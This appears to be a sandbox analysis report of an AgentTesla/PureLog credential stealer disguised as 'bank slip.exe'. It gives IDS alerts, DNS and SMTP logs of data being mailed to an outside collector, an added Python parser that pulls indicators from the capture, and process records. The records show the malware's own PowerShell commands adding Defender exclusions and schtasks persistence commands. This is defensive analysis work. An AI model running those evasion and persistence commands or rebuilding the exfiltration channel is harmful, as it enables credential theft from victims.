| RT_GROUP_ICON | 0xb584c | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xb5870 | 0x2e8 | data | | | 0.4637096774193548 |
| RT_MANIFEST | 0xb5b68 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 05/06/24-08:13:10.302990 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49712 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:12:59.940556 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49710 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:12:59.940511 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49710 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:13:10.303039 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49712 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:13:10.303039 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49712 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:13:10.303039 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49712 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:13:10.303039 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49712 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:12:59.940511 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49710 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:12:59.940556 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49710 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:12:59.940556 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49710 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:12:59.940556 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49710 | 587 | 192.168.2.5 | 111.118.215.27 |
| 05/06/24-08:13:10.302990 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49712 | 587 | 192.168.2.5 | 111.118.215.27 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 6, 2024 08:12:56.205461025 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:56.529448032 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:56.530762911 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:57.302267075 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:57.380064964 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:57.704293966 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:57.716609955 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:58.040970087 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:58.042079926 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:58.406256914 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:58.901988983 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:58.908174992 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:59.232139111 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:59.232198000 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:59.232470989 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:59.597167969 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:59.614502907 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:59.614799023 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:59.938651085 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:59.939052105 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:12:59.940510988 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:59.940556049 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:59.940577030 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:12:59.940592051 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:00.264338970 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:00.264421940 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:00.265676022 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:00.323122978 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:02.714610100 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:03.772931099 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:04.100557089 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:04.100651979 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:05.576138020 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:05.714042902 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:08.161076069 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:08.488931894 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:08.562442064 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:08.890682936 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:08.905874968 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:09.234807014 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:09.262145042 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:09.590131998 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:09.590356112 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:09.959328890 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:09.973557949 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:09.974714041 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:10.302071095 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:10.302313089 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:10.302989960 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:10.303039074 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:10.303065062 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:10.303075075 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:13:10.630368948 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:10.632023096 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:13:10.714117050 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:14:43.776997089 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:14:44.145536900 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:14:44.306164026 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
May 6, 2024 08:14:44.306956053 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:14:44.307086945 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27
May 6, 2024 08:14:44.634711981 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 6, 2024 08:12:55.142153978 CEST | 60340 | 53 | 192.168.2.5 | 1.1.1.1
May 6, 2024 08:12:56.060425043 CEST | 53 | 60340 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 6, 2024 08:12:55.142153978 CEST | 192.168.2.5 | 1.1.1.1 | 0xd9c6 | Standard query (0) | mail.vw-rmplcars.co.in | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 6, 2024 08:12:56.060425043 CEST | 1.1.1.1 | 192.168.2.5 | 0xd9c6 | No error (0) | mail.vw-rmplcars.co.in | vw-rmplcars.co.in | | CNAME (Canonical name) | IN (0x0001) | false
May 6, 2024 08:12:56.060425043 CEST | 1.1.1.1 | 192.168.2.5 | 0xd9c6 | No error (0) | vw-rmplcars.co.in | | 111.118.215.27 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
May 6, 2024 08:12:57.302267075 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 220-bh-in-12.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 06 May 2024 11:42:57 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
May 6, 2024 08:12:57.380064964 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27 | EHLO 138727
May 6, 2024 08:12:57.704293966 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 250-bh-in-12.webhostbox.net Hello 138727 [84.17.40.101]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
May 6, 2024 08:12:57.716609955 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27 | AUTH login YWNjb3VudC5zd0B2dy1ybXBsY2Fycy5jby5pbg==
May 6, 2024 08:12:58.040970087 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 334 UGFzc3dvcmQ6
May 6, 2024 08:12:58.901988983 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 235 Authentication succeeded
May 6, 2024 08:12:58.908174992 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27 | MAIL FROM:<account.sw@vw-rmplcars.co.in>
May 6, 2024 08:12:59.232198000 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 250 OK
May 6, 2024 08:12:59.232470989 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27 | RCPT TO:<express.store1@expressstore-ks.com>
May 6, 2024 08:12:59.614502907 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 250 Accepted
May 6, 2024 08:12:59.614799023 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27 | DATA
May 6, 2024 08:12:59.939052105 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
May 6, 2024 08:12:59.940592051 CEST | 49710 | 587 | 192.168.2.5 | 111.118.215.27 | .
May 6, 2024 08:13:00.265676022 CEST | 587 | 49710 | 111.118.215.27 | 192.168.2.5 | 250 OK id=1s3rat-003Aqx-2U
May 6, 2024 08:13:05.576138020 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 220-bh-in-12.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 06 May 2024 11:43:05 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
May 6, 2024 08:13:08.161076069 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27 | EHLO 138727
May 6, 2024 08:13:08.488931894 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 250-bh-in-12.webhostbox.net Hello 138727 [84.17.40.101]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
May 6, 2024 08:13:08.562442064 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27 | AUTH login YWNjb3VudC5zd0B2dy1ybXBsY2Fycy5jby5pbg==
May 6, 2024 08:13:08.890682936 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 334 UGFzc3dvcmQ6
May 6, 2024 08:13:09.234807014 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 235 Authentication succeeded
May 6, 2024 08:13:09.262145042 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27 | MAIL FROM:<account.sw@vw-rmplcars.co.in>
May 6, 2024 08:13:09.590131998 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 250 OK
May 6, 2024 08:13:09.590356112 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27 | RCPT TO:<express.store1@expressstore-ks.com>
May 6, 2024 08:13:09.973557949 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 250 Accepted
May 6, 2024 08:13:09.974714041 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27 | DATA
May 6, 2024 08:13:10.302313089 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
May 6, 2024 08:13:10.303075075 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27 | .
May 6, 2024 08:13:10.632023096 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 250 OK id=1s3rb4-003B0r-0Q
May 6, 2024 08:14:43.776997089 CEST | 49712 | 587 | 192.168.2.5 | 111.118.215.27 | QUIT
May 6, 2024 08:14:44.306164026 CEST | 587 | 49712 | 111.118.215.27 | 192.168.2.5 | 221 bh-in-12.webhostbox.net closing connection
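
The SMTP conversation above is the whole exfiltration channel: the client identifies itself with the sandbox hostname, authenticates with AUTH LOGIN even though the server advertised STARTTLS (so the mailbox credentials cross the wire in base64, not encryption), and hands two messages from the compromised sender to the collector mailbox. The Python below is an added example, not part of the Joe Sandbox report and not AgentTesla's or Exim's code. It re-encodes the first session as a C:/S: transcript (the client's base64 password reply to the 334 challenge is not shown in the report, so it is absent here too) and pulls out what a responder wants from such a capture: the decoded AUTH LOGIN username, sender, recipient, Exim queue IDs, and whether authentication happened on a session that never upgraded to TLS. The transcript constant, the C:/S: prefixes and all function names are the example's own assumptions.

```python
import base64
import binascii
import re

# Constructed re-encoding of the SMTP exchange on the 49710 -> 587 stream shown
# above: "C:" marks lines from the infected client, "S:" lines from the server.
# The client's base64 password reply to the 334 challenge is not in the report,
# so it is absent here as well.
SMTP_TRANSCRIPT = """\
S: 220-bh-in-12.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 06 May 2024 11:42:57 +0530
S: 220-We do not authorize the use of this system to transport unsolicited,
S: 220 and/or bulk e-mail.
C: EHLO 138727
S: 250-bh-in-12.webhostbox.net Hello 138727 [84.17.40.101]
S: 250-SIZE 52428800
S: 250-8BITMIME
S: 250-PIPELINING
S: 250-PIPECONNECT
S: 250-AUTH PLAIN LOGIN
S: 250-STARTTLS
S: 250 HELP
C: AUTH login YWNjb3VudC5zd0B2dy1ybXBsY2Fycy5jby5pbg==
S: 334 UGFzc3dvcmQ6
S: 235 Authentication succeeded
C: MAIL FROM:<account.sw@vw-rmplcars.co.in>
S: 250 OK
C: RCPT TO:<express.store1@expressstore-ks.com>
S: 250 Accepted
C: DATA
S: 354 Enter message, ending with "." on a line by itself
C: .
S: 250 OK id=1s3rat-003Aqx-2U
"""

ANGLE_ADDR = re.compile(r"<([^>]+)>")


def b64_to_text(token):
    """Decode one base64 SMTP AUTH token; None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def parse_smtp_transcript(text):
    """Walk a C:/S: transcript and collect the exfiltration indicators."""
    info = {"server_banner": None, "ehlo_name": None, "starttls_offered": False,
            "starttls_used": False, "auth_mechanism": None, "username": None,
            "password": None, "mail_from": None, "rcpt_to": [], "queue_ids": []}
    pending_prompt = None  # decoded text of an outstanding 334 challenge

    for raw in text.splitlines():
        side, sep, line = raw.partition(": ")
        if not sep or side not in ("C", "S"):
            continue
        if side == "S":
            code, rest = line[:3], line[4:]  # "250-" and "250 " both drop 4 chars
            if code == "220" and info["server_banner"] is None:
                info["server_banner"] = rest
            elif code == "250" and rest.upper().startswith("STARTTLS"):
                info["starttls_offered"] = True
            elif code == "250" and rest.startswith("OK id="):
                info["queue_ids"].append(rest.split("id=", 1)[1].strip())
            # A 334 challenge means the next client line is a base64 credential;
            # any other server reply (235, 535, ...) cancels that expectation.
            pending_prompt = (b64_to_text(rest) or rest) if code == "334" else None
            continue

        verb = line.split(" ", 1)[0].upper().rstrip(":")
        if pending_prompt is not None:
            decoded = b64_to_text(line)
            if pending_prompt.lower().startswith("username"):
                info["username"] = decoded
            elif pending_prompt.lower().startswith("password"):
                info["password"] = decoded
            pending_prompt = None
        elif verb in ("EHLO", "HELO"):
            parts = line.split(" ", 1)
            info["ehlo_name"] = parts[1].strip() if len(parts) > 1 else ""
        elif verb == "STARTTLS":
            info["starttls_used"] = True
        elif verb == "AUTH":
            parts = line.split()
            if len(parts) < 2:
                continue
            info["auth_mechanism"] = parts[1].upper()
            if len(parts) > 2:  # initial response sent inline with AUTH
                initial = b64_to_text(parts[2]) or ""
                if info["auth_mechanism"] == "LOGIN":
                    info["username"] = initial
                elif info["auth_mechanism"] == "PLAIN":
                    fields = initial.split("\0")  # "\0user\0password"
                    if len(fields) == 3:
                        info["username"], info["password"] = fields[1], fields[2]
        elif verb == "MAIL":
            m = ANGLE_ADDR.search(line)
            info["mail_from"] = m.group(1) if m else None
        elif verb == "RCPT":
            m = ANGLE_ADDR.search(line)
            if m:
                info["rcpt_to"].append(m.group(1))
    return info


def credentials_in_clear(info):
    """True when AUTH ran on a session that never issued STARTTLS."""
    return info["auth_mechanism"] is not None and not info["starttls_used"]


if __name__ == "__main__":
    result = parse_smtp_transcript(SMTP_TRANSCRIPT)
    for key, value in result.items():
        print(f"{key:16} {value}")
    print("credentials sent in clear:", credentials_in_clear(result))
```

On a real capture the same walk works on the reassembled TCP stream after tagging each line by direction; the point of the STARTTLS check is that the exfil mailbox password is recoverable from the pcap whenever the client authenticates before (or without) the TLS upgrade, which is exactly what this session does.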


Target ID: 0
Start time: 08:12:48
Start date: 06/05/2024
Path: C:\Users\user\Desktop\bank slip.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\bank slip.exe"
Imagebase: 0x1b0000
File size: 745'480 bytes
MD5 hash: 64FF7F01E8A040DD0708D0D3C72A09F7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071630541.0000000002916000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 08:12:49
Start date: 06/05/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
Imagebase: 0xd70000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 08:12:50
Start date: 06/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 08:12:50
Start date: 06/05/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
Imagebase: 0xd70000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 08:12:50
Start date: 06/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 08:12:50
Start date: 06/05/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
Imagebase: 0x5f0000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 08:12:50
Start date: 06/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 08:12:52
Start date: 06/05/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase: 0xcc0000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

                                                                    Target ID:10
                                                                    Start time:08:12:55
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff6ef0c0000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:08:12:57
                                                                    Start date:06/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    Imagebase:0xc10000
                                                                    File size:745'480 bytes
                                                                    MD5 hash:64FF7F01E8A040DD0708D0D3C72A09F7
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2121255868.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 24%, ReversingLabs
                                                                    • Detection: 38%, Virustotal, Browse
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:08:12:59
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"
                                                                    Imagebase:0x5f0000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:08:12:59
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:08:12:59
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xd70000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:15
                                                                    Start time:08:13:07
                                                                    Start date:06/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    Wow64 process (32bit):true
